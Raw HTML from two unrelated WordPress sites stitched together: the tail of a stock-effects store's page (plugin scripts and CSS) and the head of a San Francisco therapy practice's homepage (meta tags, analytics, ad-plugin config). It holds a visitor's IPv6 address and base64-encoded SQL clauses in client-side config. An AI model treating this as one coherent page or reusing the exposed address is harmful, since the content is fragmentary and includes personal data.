empty","loading":"Loading","select_option":"Please select an option","is_checkout":"0","default_gateway":"paypal","redirect_to_checkout":"0","checkout_page":"https:\/\/www.stockelementsfx.com\/checkout\/","permalinks":"1","quantities_enabled":"","taxes_enabled":"0"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.stockelementsfx.com/wp-content/plugins/easy-digital-downloads/assets/js/edd-ajax.min.js?ver=2.9.8'></script> <script type='text/javascript' src='https://www.stockelementsfx.com/wp-content/plugins/twenty20/assets/js/jquery.twenty20.js?ver=1.54'></script> <script type='text/javascript' src='https://www.stockelementsfx.com/wp-content/plugins/twenty20/assets/js/jquery.event.move.js?ver=1.54'></script> <script type='text/javascript' src='https://www.stockelementsfx.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4'></script> <script type='text/javascript'> /* <![CDATA[ */ var woocommerce_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.stockelementsfx.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=3.6.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var wc_cart_fragments_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","cart_hash_key":"wc_cart_hash_7fdb0b47b9d2083aaf3dec0169f134b6","fragment_name":"wc_fragments_7fdb0b47b9d2083aaf3dec0169f134b6","request_timeout":"5000"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.stockelementsfx.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=3.6.1'></script> <script type='text/javascript' src='https://www.stockelementsfx.com/wp-content/plugins/custom-scrollbar//asset/malihu-custom-scrollbar-plugin/jquery.mCustomScrollbar.concat.min.js?ver=4.9.8'></script> <script type='text/javascript'> /* <![CDATA[ */ var custom_scrollbar_enabler = {"scrollbars":[{"name":"Dashboard","status":true,"selector":".elementor-element-ebaa11c","height":{"size":"722","unit":"px"},"width":{"size":"","unit":"px"},"position":"inside","inline_css":[{"property":"","value":""}],"theme":"inset-3","mouseWheel":{"enable":true,"scrollAmount":"auto"},"keyboard":{"enable":true,"scrollAmount":"auto"},"scrollButtons":{"enable":true,"scrollAmount":"auto","scrollType":"stepless"},"mCSB_draggerContainer":"#e5e5e5","mCSB_dragger":"#8224e3","mCSB_dragger_bar":"#ffffff","mCSB_draggerRail":"#ffffff","mCSB_scrollTools":"#8224e3","initialize_on_ajax_load":false,"responsive":{"enable":true,"screen_width_range":[[1,0]]}}]}; /* ]]> */ </script> <script type='text/javascript' src='https://www.stockelementsfx.com/wp-content/plugins/custom-scrollbar//asset/js/custom-scrollbar-enabler.min.js?ver=4.9.8'></script> <script type='text/javascript' src='https://www.stockelementsfx.com/wp-content/themes/mayosis/js/sticky.js?ver=1.0'></script> <script type='text/javascript' src='https://www.stockelementsfx.com/wp-content/themes/mayosis/js/bootstrap.min.js?ver=1.0'></script> <script type='text/javascript' src='https://www.stockelementsfx.com/wp-content/themes/mayosis/js/scrollspy.js?ver=3.3.7'></script> <script type='text/javascript' src='https://www.stockelementsfx.com/wp-includes/js/hoverIntent.min.js?ver=1.8.1'></script> <script type='text/javascript' src='https://www.stockelementsfx.com/wp-content/themes/mayosis/js/theme.min.js?ver=1.0'></script> <script type='text/javascript' src='https://www.stockelementsfx.com/wp-content/themes/mayosis/js/youtube.min.js?ver=1.0'></script> <script type='text/javascript' src='https://www.stockelementsfx.com/wp-content/themes/mayosis/js/jquery.easing.min.js?ver=1.4.1'></script> <script type='text/javascript' src='https://www.stockelementsfx.com/wp-content/themes/mayosis/js/lity.min.js?ver=1.0.1'></script> <script type='text/javascript' src='https://www.stockelementsfx.com/wp-content/themes/mayosis/js/jquery.isotope.min.js?ver=1.5.6'></script> <script type='text/javascript' src='https://www.stockelementsfx.com/wp-content/themes/mayosis/js/modernizr.js?ver=2.7.1'></script> <script type='text/javascript' src='https://www.stockelementsfx.com/wp-content/themes/mayosis/js/fallback.js?ver=1.1'></script> <script type='text/javascript' src='https://www.stockelementsfx.com/wp-content/themes/mayosis/js/jquery.parallax-scroll.js?ver=1.1'></script> <script type='text/javascript' src='https://www.stockelementsfx.com/wp-content/themes/mayosis/js/parallax.hover.js?ver=1.5'></script> <script type='text/javascript' src='https://www.stockelementsfx.com/wp-content/themes/mayosis/js/gallery.min.js?ver=1.1'></script> <script type='text/javascript' src='https://www.stockelementsfx.com/wp-content/themes/mayosis/js/gallery.main.js?ver=0.9.4'></script> <script type='text/javascript'> /* <![CDATA[ */ var edd_infinite_scrolling = {"ajax_url":"https:\/\/www.stockelementsfx.com\/wp-admin\/admin-ajax.php","nonce":"ea5dd7df41","in_animation":""}; /* ]]> */ </script> <script type='text/javascript' src='https://www.stockelementsfx.com/wp-content/plugins/edd-infinite-scrolling/assets/js/edd-infinite-scroll.min.js?ver=1.0.5'></script> <script type='text/javascript' src='https://www.stockelementsfx.com/wp-content/plugins/lumise/woo/assets/js/frontend.js?ver=1.7.5'></script> <script type='text/javascript' data-cfasync="false" src='https://www.stockelementsfx.com/wp-content/plugins/s2member/s2member-o.php?ws_plugin__s2member_js_w_globals=1&#038;qcABC=1&#038;ver=170722-170722-2623888357'></script> <script type='text/javascript' src='https://www.stockelementsfx.com/wp-includes/js/wp-embed.min.js?ver=4.9.8'></script> <script type='text/javascript' src='https://www.stockelementsfx.com/wp-content/plugins/mayosis-core/kirki/modules/webfont-loader/vendor-typekit/webfontloader.js?ver=3.0.28'></script> <script type='text/javascript'> WebFont.load({google:{families:['Poppins:400,900:cyrillic,cyrillic-ext,devanagari,greek,greek-ext,khmer,latin,latin-ext,vietnamese,hebrew,arabic,bengali,gujarati,tamil,telugu,thai']}}); </script> <script type='text/javascript' src='https://www.stockelementsfx.com/wp-content/plugins/elementor-pro/assets/lib/sticky/jquery.sticky.min.js?ver=2.1.4'></script> <script type='text/javascript'> /* <![CDATA[ */ var ElementorProFrontendConfig = {"ajaxurl":"https:\/\/www.stockelementsfx.com\/wp-admin\/admin-ajax.php","nonce":"17d9cfb166","shareButtonsNetworks":{"facebook":{"title":"Facebook","has_counter":true},"twitter":{"title":"Twitter"},"google":{"title":"Google+","has_counter":true},"linkedin":{"title":"LinkedIn","has_counter":true},"pinterest":{"title":"Pinterest","has_counter":true},"reddit":{"title":"Reddit","has_counter":true},"vk":{"title":"VK","has_counter":true},"odnoklassniki":{"title":"OK","has_counter":true},"tumblr":{"title":"Tumblr"},"delicious":{"title":"Delicious"},"digg":{"title":"Digg"},"skype":{"title":"Skype"},"stumbleupon":{"title":"StumbleUpon","has_counter":true},"telegram":{"title":"Telegram"},"pocket":{"title":"Pocket","has_counter":true},"xing":{"title":"XING","has_counter":true},"whatsapp":{"title":"WhatsApp"},"email":{"title":"Email"},"print":{"title":"Print"}},"facebook_sdk":{"lang":"en_US","app_id":""}}; /* ]]> */ </script> <script type='text/javascript' src='https://www.stockelementsfx.com/wp-content/plugins/elementor-pro/assets/js/frontend.min.js?ver=2.1.4'></script> <script type='text/javascript' src='https://www.stockelementsfx.com/wp-content/plugins/elementor/assets/js/frontend-modules.js?ver=2.4.7'></script> <script type='text/javascript' src='https://www.stockelementsfx.com/wp-includes/js/jquery/ui/position.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://www.stockelementsfx.com/wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js?ver=4.7.1'></script> <script type='text/javascript' src='https://www.stockelementsfx.com/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.0.2'></script> <script type='text/javascript' src='https://www.stockelementsfx.com/wp-content/plugins/elementor/assets/lib/swiper/swiper.jquery.min.js?ver=4.4.3'></script> <script type='text/javascript'> /* <![CDATA[ */ var elementorFrontendConfig = {"environmentMode":{"edit":false,"wpPreview":false},"is_rtl":"","breakpoints":{"xs":0,"sm":480,"md":768,"lg":1025,"xl":1440,"xxl":1600},"version":"2.4.7","urls":{"assets":"https:\/\/www.stockelementsfx.com\/wp-content\/plugins\/elementor\/assets\/"},"settings":{"page":[],"general":{"elementor_global_image_lightbox":"yes","elementor_enable_lightbox_in_editor":"yes"}},"post":{"id":417,"title":"Home - Login","excerpt":""}}; /* ]]> */ </script> <script type='text/javascript' src='https://www.stockelementsfx.com/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=2.4.7'></script> <!-- Custom UseyourDrive CSS Styles --> <style type="text/css" media="screen"> #UseyourDrive .nav-header {font-size:110%;}#UseyourDrive a.nav-search {width:95px;}#UseyourDrive a.nav-search:after {content:"Search";}iframe[src*="useyourdrive"] {background:url(https://www.stockelementsfx.com/wp-content/plugins/use-your-drive/css/images/iframeloader.gif);background-repeat:no-repeat;background-position:center center;}#UseyourDrive,.UseyourDrive,.UseyourDrive p,#UseyourDrive a,.UseyourDrive a{color:#666}#UseyourDrive a:hover,.UseyourDrive a:hover,#UseyourDrive a:hover,.UseyourDrive a:hover,#UseyourDrive .nav-search.inuse{color:#29ADE2}#UseyourDrive,#UseyourDrive .loading,#UseyourDrive .loading.search,#UseyourDrive div.scroll-to-top{background-color:#f2f2f2}#UseyourDrive .loading .loader-beat{background-color:#29ADE2}#UseyourDrive .loading .loader-spinner .path{stroke:#29ADE2}#UseyourDrive .nav-header,#UseyourDrive .selected-folder,#UseyourDrive .fileuploadform,#UseyourDrive .fileupload-info-container{background-color:#fcfcfc}#UseyourDrive .nav-header{border-color:#e8e8e8}#UseyourDrive .entry,#UseyourDrive .newfolder{background-color:#fff}#UseyourDrive .image-folder,#UseyourDrive .entry:hover,#UseyourDrive .entry.hasfocus,#UseyourDrive .entry.isdragged,#UseyourDrive .entry.popupopen,#UseyourDrive .entry.isselected,#UseyourDrive .image-folder .folder-text,#UseyourDrive .image-container .entry-text{background-color:#29ADE2}#UseyourDrive .entry.hasfocus,#UseyourDrive .entry.hasfocus a,#UseyourDrive .entry.popupopen,#UseyourDrive .entry.popupopen a,#UseyourDrive .entry.isselected,#UseyourDrive .entry.isselected a,#UseyourDrive .entry.isdragged,#UseyourDrive .entry.isdragged a,#UseyourDrive .entry:hover,#UseyourDrive .entry:hover a,#UseyourDrive .image-folder .folder-text,#UseyourDrive .image-container .entry-text,.uyd-mobile #UseyourDrive .uyd-grid .entry_edit a{color:#fff}#UseyourDrive div.preloading{background-color:#29ADE2}.UseyourDrive .gear-menu li>a,.UseyourDrive .download-zip-menu li>a,.UseyourDrive .uyd-dropdown-menu li>a{color:#666}.UseyourDrive .gear-menu li>a:hover,.UseyourDrive .download-zip-menu li>a:hover,.UseyourDrive .uyd-dropdown-menu li>a:hover{background-color:#29ADE2;color:#fff}.qtip.UseyourDrive{background-color:#fcfcfc;color:#666}.UseyourDrive.useyourdrive-modal .modal-content{background-color:#fcfcfc;color:#666}#UseyourDrive .button,.UseyourDrive .button,#UseyourDrive .button:hover,.UseyourDrive .button:hover,#UseyourDrive .button:focus,.UseyourDrive .button:focus{background:#29ADE2}#UseyourDrive .button,.UseyourDrive .button{color:#fff}#UseyourDrive input[type=text]:focus,.UseyourDrive input[type=text]:focus,#UseyourDrive input[type=search]:focus,.UseyourDrive input[type=search]:focus,#UseyourDrive input[type=radio]:focus,.UseyourDrive input[type=radio]:focus,#UseyourDrive input[type=checkbox]:focus,.UseyourDrive input[type=checkbox]:focus,#UseyourDrive select:focus,.UseyourDrive select:focus,#UseyourDrive textarea:focus,.UseyourDrive textarea:focus{border-color:#29ADE2;box-shadow:0 0 8px 0 rgba(0,0,0,.4);-webkit-box-shadow:0 0 8px 0 rgba(0,0,0,.4);-moz-box-shadow:0 0 8px 0 rgba(0,0,0,.4)}#UseyourDrive .fileuploadform{border-color:#e8e8e8}#UseyourDrive .fileupload-buttonbar,#UseyourDrive .template-upload,#UseyourDrive .template-download{background:#f2f2f2}#UseyourDrive .template-upload,#UseyourDrive .template-download{border-color:#e8e8e8!important}#UseyourDrive .in .fileuploadform{border-style:dotted}#UseyourDrive .hover .fileuploadform{border-color:#29ADE2!important}#UseyourDrive .fileuploadform a:hover i,#UseyourDrive .hover .fileupload-drag-drop{color:#29ADE2}#UseyourDrive .upload-progress .ui-progressbar-value{background:#29ADE2}#UseyourDrive .jp-gui,#UseyourDrive div.jp-playlist{background-color:#f2f2f2}#UseyourDrive .UseyourDrive.media a,#UseyourDrive .jp-playlist-item-song-title,#UseyourDrive .jp-playlist-item-song-artist{color:#666}#UseyourDrive .UseyourDrive.media a:hover,#UseyourDrive .jp-playlist-current .jp-playlist-item-song-title,#UseyourDrive .jp-playlist-current .jp-playlist-item-song-artist{color:#29ADE2}#UseyourDrive .jp-gui .jp-progress .jp-seek-bar .jp-seek-bar{background-color:#666}#UseyourDrive .jp-gui .jp-progress .jp-seek-bar{background-color:#999}#UseyourDrive .jp-gui .jp-progress .jp-seek-bar:after,#UseyourDrive .jp-gui .jp-volume-bar .currentVolume .jp-volume-bar-value,#UseyourDrive .jp-gui .jp-progress .jp-seek-bar .jp-play-bar:after{background-color:#29ADE2}</style> <div class="modal fade" id="edd-wl-modal" tabindex="-1" role="dialog" aria-labelledby="edd-wl-modal-label" aria-hidden="true"> <div class="modal-dialog"> <div class="modal-content"> </div> </div> </div> </body> </html>
0
<!DOCTYPE html> <html lang="en-US" xmlns:fb="http://ogp.me/ns/fb#" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#"> <head> <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= 'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-N4RD9CG');</script> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <link rel="profile" href="http://gmpg.org/xfn/11" /> <link rel="pingback" href="http://www.psychedinsanfrancisco.com/xmlrpc.php" /> <link rel="stylesheet" href="http://fonts.googleapis.com/css?family=Open Sans Condensed:300,400,700" /> <link rel="stylesheet" href="http://www.psychedinsanfrancisco.com/wp-content/themes/bb-theme/css/bootstrap.min.css" /> <!--[if lt IE 9]> <script src="http://www.psychedinsanfrancisco.com/wp-content/themes/bb-theme/js/html5shiv.js"></script> <script src="http://www.psychedinsanfrancisco.com/wp-content/themes/bb-theme/js/respond.min.js"></script> <![endif]--> <title>Psyched in San Francisco | Therapist | Couples Therapy </title> <meta name="title" content="Psyched in San Francisco | Therapist | Couples Therapy " /> <meta name="twitter:domain" content="Psyched in San Francisco" /> <meta name="description" content="Psyched in San Francisco is a group of psychotherapists providing state-of-the-art psychotherapy, couples therapy and marriage counseling." /> <meta name="robots" content="noodp" /> <link rel="canonical" href="http://www.psychedinsanfrancisco.com/" /> <link rel="publisher" href="https://plus.google.com/+PsychedinSanFrancisco" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Psyched in San Francisco | Therapist | Couples Therapy " /> <meta property="og:description" content="Psyched in San Francisco is a group of psychotherapists providing state-of-the-art psychotherapy, couples therapy and marriage counseling." /> <meta property="og:url" content="http://www.psychedinsanfrancisco.com/" /> <meta property="og:site_name" content="Psyched in San Francisco" /> <meta property="fb:admins" content="100003609651668" /> <meta property="og:image" content="http://www.psychedinsanfrancisco.com/wp-content/uploads/2014/10/fastcompany.png" /> <meta property="og:image" content="http://www.psychedinsanfrancisco.com/wp-content/uploads/2013/07/la_times.jpg" /> <meta property="og:image" content="http://www.psychedinsanfrancisco.com/wp-content/uploads/2014/10/wallstreetjournal.png" /> <meta property="og:image" content="http://www.psychedinsanfrancisco.com/wp-content/uploads/2014/10/bayareaparent.png" /> <meta property="og:image" content="http://www.psychedinsanfrancisco.com/wp-content/uploads/2014/10/huffingtonpost.png" /> <meta property="og:image" content="http://www.psychedinsanfrancisco.com/wp-content/uploads/2013/07/kqed1.jpg" /> <meta property="og:image" content="http://www.psychedinsanfrancisco.com/wp-content/uploads/2013/07/sf_chronicle_logo.jpg" /> <meta property="og:image" content="http://www.psychedinsanfrancisco.com/wp-content/uploads/2013/07/cbslocal.jpg" /> <meta property="og:image" content="http://www.psychedinsanfrancisco.com/wp-content/uploads/2016/01/washington-post-e1494130758159.png" /> <meta property="og:image" content="http://www.psychedinsanfrancisco.com/wp-content/uploads/2016/01/NBC-Bay-area-e1494130843177.jpg" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:description" content="Psyched in San Francisco is a group of psychotherapists providing state-of-the-art psychotherapy, couples therapy and marriage counseling." /> <meta name="twitter:title" content="Psyched in San Francisco | Therapist | Couples Therapy " /> <meta name="twitter:site" content="@PsychedinSF" /> <meta name="twitter:image" content="http://www.psychedinsanfrancisco.com/wp-content/uploads/2014/10/fastcompany.png" /> <meta name="twitter:creator" content="@PsychedinSF" /> <script type='application/ld+json'>{"@context":"http:\/\/schema.org","@type":"WebSite","@id":"#website","url":"http:\/\/www.psychedinsanfrancisco.com\/","name":"San Francisco Psychotherapy, San Francisco Couples Counseling, Marriage Therapy","alternateName":"A Center for Psychotherapy and Couples Counseling in San Francisco","potentialAction":{"@type":"SearchAction","target":"http:\/\/www.psychedinsanfrancisco.com\/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <script type='application/ld+json'>{"@context":"http:\/\/schema.org","@type":"Organization","url":"http:\/\/www.psychedinsanfrancisco.com\/","sameAs":["https:\/\/www.facebook.com\/PsychedinSanFrancisco2","https:\/\/plus.google.com\/+PsychedinSanFrancisco","https:\/\/twitter.com\/PsychedinSF"],"@id":"#organization","name":"Psyched in San Francisco","logo":"http:\/\/www.psychedinsanfrancisco.com\/wp-content\/uploads\/2015\/10\/Psyched_Logo_Tagline.png"}</script> <meta name="msvalidate.01" content="6541206F65DDA5519D5B386DE9E4A75A" /> <meta name="google-site-verification" content="dPBAlP93kLregK8QYEktkhQ4p257OS8y-c-r44a4LXM" /> <link rel='dns-prefetch' href='//www.psychedinsanfrancisco.com' /> <link rel='dns-prefetch' href='//maxcdn.bootstrapcdn.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Psyched in San Francisco &raquo; Feed" href="http://www.psychedinsanfrancisco.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Psyched in San Francisco &raquo; Comments Feed" href="http://www.psychedinsanfrancisco.com/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.psychedinsanfrancisco.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.7.13"}}; !function(a,b,c){function d(a){var b,c,d,e,f=String.fromCharCode;if(!k||!k.fillText)return!1;switch(k.clearRect(0,0,j.width,j.height),k.textBaseline="top",k.font="600 32px Arial",a){case"flag":return k.fillText(f(55356,56826,55356,56819),0,0),!(j.toDataURL().length<3e3)&&(k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57331,65039,8205,55356,57096),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57331,55356,57096),0,0),c=j.toDataURL(),b!==c);case"emoji4":return k.fillText(f(55357,56425,55356,57341,8205,55357,56507),0,0),d=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55357,56425,55356,57341,55357,56507),0,0),e=j.toDataURL(),d!==e}return!1}function e(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i,j=b.createElement("canvas"),k=j.getContext&&j.getContext("2d");for(i=Array("flag","emoji4"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='ataa.css-css' href='http://www.psychedinsanfrancisco.com/wp-content/plugins/about-the-author-advanced/css/ataa.css?t=1558021454&#038;ver=4.7.13' type='text/css' media='all' /> <link rel='stylesheet' id='neliofp_style_css-css' href='http://www.psychedinsanfrancisco.com/wp-content/plugins/nelio-featured-posts/assets/style.min.css?version=2.2.1&#038;ver=4.7.13' type='text/css' media='all' /> <link rel='stylesheet' id='simple_tooltips_style-css' href='http://www.psychedinsanfrancisco.com/wp-content/plugins/simple-tooltips/zebra_tooltips.css?ver=4.7.13' type='text/css' media='all' /> <link rel='stylesheet' id='jquery-bxslider-css' href='http://www.psychedinsanfrancisco.com/wp-content/plugins/bb-plugin/css/jquery.bxslider.css?ver=1.8' type='text/css' media='all' /> <link rel='stylesheet' id='font-awesome-css' href='https://maxcdn.bootstrapcdn.com/font-awesome/4.6.2/css/font-awesome.min.css?ver=1.8' type='text/css' media='all' /> <link rel='stylesheet' id='fl-builder-layout-6369-css' href='http://www.psychedinsanfrancisco.com/wp-content/uploads/bb-plugin/cache/6369-layout.css?ver=9e5c7edd3648b591e7c9dcab17090b43' type='text/css' media='all' /> <link rel='stylesheet' id='juiz_sps_styles-css' href='http://www.psychedinsanfrancisco.com/wp-content/plugins/juiz-social-post-sharer/css/juiz-social-post-sharer-3.min.css?ver=1.4.7' type='text/css' media='all' /> <link rel='stylesheet' id='pc_google_analytics-frontend-css' href='http://www.psychedinsanfrancisco.com/wp-content/plugins/pc-google-analytics/assets/css/frontend.css?ver=1.0.0' type='text/css' media='all' /> <link rel='stylesheet' id='page-list-style-css' href='http://www.psychedinsanfrancisco.com/wp-content/plugins/sitemap/css/page-list.css?ver=4.3' type='text/css' media='all' /> <link rel='stylesheet' id='issuem_style-css' href='http://www.psychedinsanfrancisco.com/wp-content/plugins/issuem/css/issuem.css?ver=2.7.1' type='text/css' media='all' /> <link rel='stylesheet' id='jquery-issuem-flexslider-css' href='http://www.psychedinsanfrancisco.com/wp-content/plugins/issuem/css/flexslider.css?ver=2.7.1' type='text/css' media='all' /> <link rel='stylesheet' id='highlight-and-share-css' href='http://www.psychedinsanfrancisco.com/wp-content/plugins/highlight-and-share/css/highlight-and-share.css?ver=20160521' type='text/css' media='all' /> <link rel='stylesheet' id='mono-social-icons-css' href='http://www.psychedinsanfrancisco.com/wp-content/themes/bb-theme/css/mono-social-icons.css?ver=1.5.1' type='text/css' media='all' /> <link rel='stylesheet' id='jquery-magnificpopup-css' href='http://www.psychedinsanfrancisco.com/wp-content/plugins/bb-plugin/css/jquery.magnificpopup.css?ver=1.8' type='text/css' media='all' /> <link rel='stylesheet' id='wp-author-bio-css' href='http://www.psychedinsanfrancisco.com/wp-content/plugins/wp-about-author/wp-about-author.css?ver=4.7.13' type='text/css' media='all' /> <script type='text/javascript' src='http://www.psychedinsanfrancisco.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='http://www.psychedinsanfrancisco.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='http://www.psychedinsanfrancisco.com/wp-content/plugins/pc-google-analytics/assets/js/frontend.min.js?ver=1.0.0'></script> <script type='text/javascript'> /* <![CDATA[ */ var samAjax = {"ajaxurl":"http:\/\/www.psychedinsanfrancisco.com\/wp-content\/plugins\/simple-ads-manager\/sam-ajax.php","loadurl":"http:\/\/www.psychedinsanfrancisco.com\/wp-content\/plugins\/simple-ads-manager\/sam-ajax-loader.php","load":"","mailer":"1","clauses":"YTo0OntzOjI6IldDIjtzOjI5NDoiKElGKHNhLmFkX3VzZXJzID0gMCwgVFJVRSwgKHNhLmFkX3VzZXJzX3VucmVnID0gMSkpKSBBTkQgKChzYS52aWV3X3R5cGUgPSAxKSBPUiAoc2Eudmlld190eXBlID0gMCBBTkQgKHNhLnZpZXdfcGFnZXMrMCAmIDExKSkgT1IgKHNhLnZpZXdfdHlwZSA9IDIgQU5EIEZJTkRfSU5fU0VUKDYzNjksIHNhLnZpZXdfaWQpKSkgQU5EIChzYS5hZF9jYXRzID0gMCkgIEFORCAoc2EuYWRfYXV0aG9ycyA9IDApICAgIEFORCBJRihzYS54X2lkLCBOT1QgRklORF9JTl9TRVQoNjM2OSwgc2EueF92aWV3X2lkKSwgVFJVRSkgICAgIjtzOjM6IldDVCI7czozNjI6IiBBTkQgSUYoc2EuYWRfc2NoZWR1bGUsIENVUkRBVEUoKSBCRVRXRUVOIHNhLmFkX3N0YXJ0X2RhdGUgQU5EIHNhLmFkX2VuZF9kYXRlLCBUUlVFKSBBTkQgSUYoc2EubGltaXRfaGl0cywgc2EuaGl0c19saW1pdCA+IChTRUxFQ1QgSUZOVUxMKENPVU5UKCopLCAwKSBGUk9NIHdwX3NhbV9zdGF0cyBzcyBXSEVSRSBzcy5pZCA9IHNhLmlkIEFORCBzcy5ldmVudF90eXBlID0gMCksIFRSVUUpIEFORCBJRihzYS5saW1pdF9jbGlja3MsIHNhLmNsaWNrc19saW1pdCA+IChTRUxFQ1QgSUZOVUxMKENPVU5UKCopLCAwKSBGUk9NIHdwX3NhbV9zdGF0cyBzcyBXSEVSRSBzcy5pZCA9IHNhLmlkIEFORCBzcy5ldmVudF90eXBlID0gMSksIFRSVUUpIjtzOjM6IldDVyI7czo4MDoiIEFORCBJRihzYS5hZF93ZWlnaHQgPiAwLCAoc2EuYWRfd2VpZ2h0X2hpdHMqMTAvKHNhLmFkX3dlaWdodCoxMDAwKSkgPCAxLCBGQUxTRSkiO3M6NDoiV0MyVyI7czoyMjoiQU5EIChzYS5hZF93ZWlnaHQgPiAwKSI7fQ==","doStats":"1","container":"sam-container","place":"sam-place","ad":"sam-ad"}; /* ]]> */ </script> <script type='text/javascript' src='http://www.psychedinsanfrancisco.com/wp-content/plugins/simple-ads-manager/js/sam-layout.min.js?ver=2.9.8.125'></script> <script type='text/javascript' src='http://www.psychedinsanfrancisco.com/wp-content/plugins/issuem/js/jquery.flexslider-min.js?ver=2.7.1'></script> <link rel='https://api.w.org/' href='http://www.psychedinsanfrancisco.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.psychedinsanfrancisco.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.psychedinsanfrancisco.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 4.7.13" /> <link rel='shortlink' href='http://www.psychedinsanfrancisco.com/' /> <link rel="alternate" type="application/json+oembed" href="http://www.psychedinsanfrancisco.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.psychedinsanfrancisco.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="http://www.psychedinsanfrancisco.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.psychedinsanfrancisco.com%2F&#038;format=xml" /> <script type="text/javascript"> <!-- function bb2_addLoadEvent(func) { var oldonload = window.onload; if (typeof window.onload != 'function') { window.onload = func; } else { window.onload = function() { oldonload(); func(); } } } bb2_addLoadEvent(function() { for ( i=0; i < document.forms.length; i++ ) { if (document.forms[i].method == 'post') { var myElement = document.createElement('input'); myElement.setAttribute('type', 'hidden'); myElement.name = 'bb2_screener_'; myElement.value = '1558021454 2601:18c:4300:d161:d8ff:3e76:f9a8:f82f'; document.forms[i].appendChild(myElement); } } }); // --></script> <meta property="fb:app_id" content="1402038253368883" /><meta property="fb:admins" content="Traci Ruble" /> <link rel="stylesheet" type="text/css" href="http://www.psychedinsanfrancisco.com/wp-content/plugins/leadsius/assets/font-awesome/css/font-awesome.css" /> <link rel="stylesheet" type="text/css" href="http://www.psychedinsanfrancisco.com/wp-content/plugins/leadsius/assets/css/main.css" /> <link rel="stylesheet" type="text/css" href="http://www.psychedinsanfrancisco.com/wp-content/plugins/leadsius/assets/css/responsive.css" /> <script type="text/javascript" src="http://www.psychedinsanfrancisco.com/wp-content/plugins/leadsius/assets/js/leadsius-forms.js"></script> <style type="text/css" media="screen">.menu-item.hide_this_item{ display:none !important; }</style> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-35786383-2', 'auto'); ga('send', 'pageview'); </script> <style type="text/css"> .avatar {vertical-align:middle} .credit {font-size: 50%;} </style> <style type="text/css"></style> <style type="text/css"> .synved-social-resolution-single { display: inline-block; } .synved-social-resolution-normal { display: inline-block; } .synved-social-resolution-hidef { display: none; } @media only screen and (min--moz-device-pixel-ratio: 2), only screen and (-o-min-device-pixel-ratio: 